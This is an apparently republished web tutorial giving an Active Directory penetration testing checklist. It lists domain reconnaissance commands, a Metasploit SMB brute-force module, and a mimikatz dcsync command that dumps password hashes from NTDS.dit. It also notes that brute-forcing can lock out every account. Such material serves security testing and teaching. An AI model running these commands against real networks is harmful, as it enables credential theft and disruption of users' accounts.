Active Directory  - 7Sm4Y1546836297 - A complete Active Directory Penetration Testing Checklist

directory this article can be helpful for testers and security experts who want to secure their network.

Active Directory” Calles as “AD” is a directory service that Microsoft developed for the domain network. using it you can to control domain computers and services that are running on every node of your domain.

Penetration Testing Active Directory:

in this section, we have some levels, the first level is reconnaissance your network. every user can enter a domain by having an account in the domain controller (DC). all this information is just gathered by the user that is an AD user. in the username there are two parts that first is the domain name and the second part is your username. like below :


+             c: > net user

by running this
command in CMD (Command Prompt) you can easily see local users on your PC.

+             c: >whoami

this command can help
you to see current user logged in.

+             c: >whoami /groups

this command helps
you to show you current group

+             c: > net user domain

this command shows
you all users from any group in the active directory.
also you can see every user’s group by running this command :

+             c: > net user [username] domain.

to have a better look, you can user “AD Recon” script. AD Recon is a script that written by “Sense of Security“.

it use about 12 thousand lines of PowerShell script that gives you a good look to AD and all info that you will need it.

you can download this script from GitHub :
screenshots of the report of this app:

- ad1 - A complete Active Directory Penetration Testing Checklist
- ad2 - A complete Active Directory Penetration Testing Checklist
Picture2 – List of AD Groups
- ad3 - A complete Active Directory Penetration Testing Checklist
Picture3 – List of DNS Record Zones

when you get all AD users, now you should to take a look to the group policy. group policy is a feature of Microsoft windows NT family of operating systems that controls the working environment of user accounts and computer accounts. in the group policy you can see environment policy such as”Account Lockout Policy“.

it is method that provide you networks users to be secure from password-guessing attacks. also you can see “Password Policy“. A password policy is a set of rules designed to enhance computer security by encouraging users to employ strong passwords and use them properly.

when you get all that you need, now you can execute different attacks on users like :

Brute force :

for brute force attack on active directory, you can use Metasploit Framework auxiliaries. you can user below auxiliary:

msf > use auxiliary/scanner/smb/smb_login

in options of this auxiliary you can set username file and password file. and set an IP that have SMB service as open.

then you can running this auxiliary by entering “run” command.

if you try false passwords more than Account Lockout Policy, you can see this message “Account Has Been Locked out“.

if you try it on all accounts, all users will be disable and you can see disorder in network. as you can see in Password Policy, you can set your password list to brute-force.

All hashes are stored in a file named “NTDS.dit” in this location :


you will extract hashes from this file by using mimikatz. mimikatz has a feature which utilities the Directory Replication Service (DRS) to retrieve the password hashes from NTDS.DIT file. you can run it as you can see below :
mimikatz # lsadump::dcsync /domain:pentestlab.local /all /csv

Then you can see hashes and password (if password can be find).

Source & Credits

The Article Prepared by Omid Shojaei , @Dmitriy_area51 , Pentester.   All the Content of this Article Belongs to above Original Author.“GBHackers On Security” won’t take any credits. This article is only for an Educational purpose. Any actions and or activities related to the material contained on this Website is solely your responsibility.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep your self-updated.

Source link
Based Blockchain Network


Please enter your comment!
Please enter your name here